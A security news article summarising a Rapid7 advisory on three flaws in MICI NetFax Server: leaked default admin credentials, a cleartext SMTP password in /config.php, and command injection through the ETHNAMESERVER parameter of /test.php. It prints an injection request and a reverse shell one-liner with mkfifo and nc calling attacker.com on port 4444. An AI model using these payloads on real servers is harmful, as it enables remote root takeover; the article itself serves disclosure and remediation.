MICI NetFax Server Flaws Allow Attackers to Execute Remote Code
In a recent security advisory, Rapid7 has disclosed three severe vulnerabilities in MICI Network Co., Ltd’s NetFax Server, affecting all versions before 3.0.1.0.
These flaws—CVE-2025-48045, CVE-2025-48046, and CVE-2025-48047—allow attackers to gain root-level access through a chain of authenticated attacks, with default credentials and sensitive information exposed in cleartext.
Despite the risks, the vendor has stated it will not address these vulnerabilities, leaving organizations reliant on this product exposed to significant threats.
The first vulnerability, CVE-2025-48045, involves the disclosure of default administrative credentials via HTTP GET requests to the /client.php endpoint.
When users connect to the web application, the server responds with default System Administrator credentials in cleartext, a result of legacy support for the ‘OneIn’ client.
This issue is classified as CWE-201: Insertion of Sensitive Information Into Sent Data and carries a CVSS 4.0 score of 6.6 (Moderate).
The second flaw, CVE-2025-48046, pertains to the exposure of stored SMTP passwords.
While the web interface redacts passwords, the actual configuration file, accessible via a GET request to /config.phpReturns the SMTP password in cleartext.
This is a classic CWE-260: Password in Configuration File scenario, rated at 5.3 (Moderate) on the CVSS scale.
Command Injection Enables Remote Code Execution
The most critical vulnerability, CVE-2025-48047, allows authenticated users to exploit improper input sanitization in the server’s testing functions, particularly those accessible via /test.php.
Parameters such as ETHNAMESERVER can be manipulated to inject system commands, including reverse shell payloads, using the mkfifo and nc binaries.
This vulnerability is categorized under CWE-78: Improper Neutralization of Special Elements used in an OS Command (“OS Command Injection”) and is rated as Critical (CVSS 9.4).
A simplified example of the attack chain is as follows:
textGET /test.php?ETHNAMESERVER=`whoami` HTTP/1.1
Host: vulnerable-server
This unsanitized input is executed by the server, leading to remote code execution (RCE) as the root user.
Attackers can escalate this with a reverse shell payload:
bashmkfifo /tmp/s; nc attacker.com 4444 0/s | /bin/sh >/tmp/s 2>&1; rm /tmp/s
Vendor Response and Risk Mitigation
Despite repeated attempts by Rapid7 and TWCERT to engage MICI, the vendor has refused to address these vulnerabilities, advising only that users should not expose the NetFax Server to external networks.
However, the risk remains for internal exploitation, especially since default credentials are not enforced to be changed at first login, and sensitive data is insufficiently protected.
MICI NetFax Server Vulnerabilities
| CVE ID | Vulnerability Description | CWE | CVSS 4.0 | Attack Vector | Severity |
|---|---|---|---|---|---|
| CVE-2025-48045 | Default Credentials Disclosure | CWE-201 | 6.6 | GET /client.php | Moderate |
| CVE-2025-48046 | Stored Passwords in Cleartext | CWE-260 | 5.3 | GET /config.php | Moderate |
| CVE-2025-48047 | Command Injection (RCE) | CWE-78 | 9.4 | GET /test.php (ping functionality) | Critical |
Remediation steps recommended by Rapid7 include:
- Do not expose the server to the internet or unnecessary internal networks.
- Change the default credentials immediately after installation.
- Redact sensitive information from configuration files before sending to clients.
- Implement strict input sanitization and server-side validation for all configuration parameters.
With no vendor patch forthcoming, organizations are urged to review their exposure and consider decommissioning affected devices, as some customers have already done.
Security teams using Rapid7’s InsightVM and Nexpose can assess their exposure with unauthenticated checks provided in the latest content release.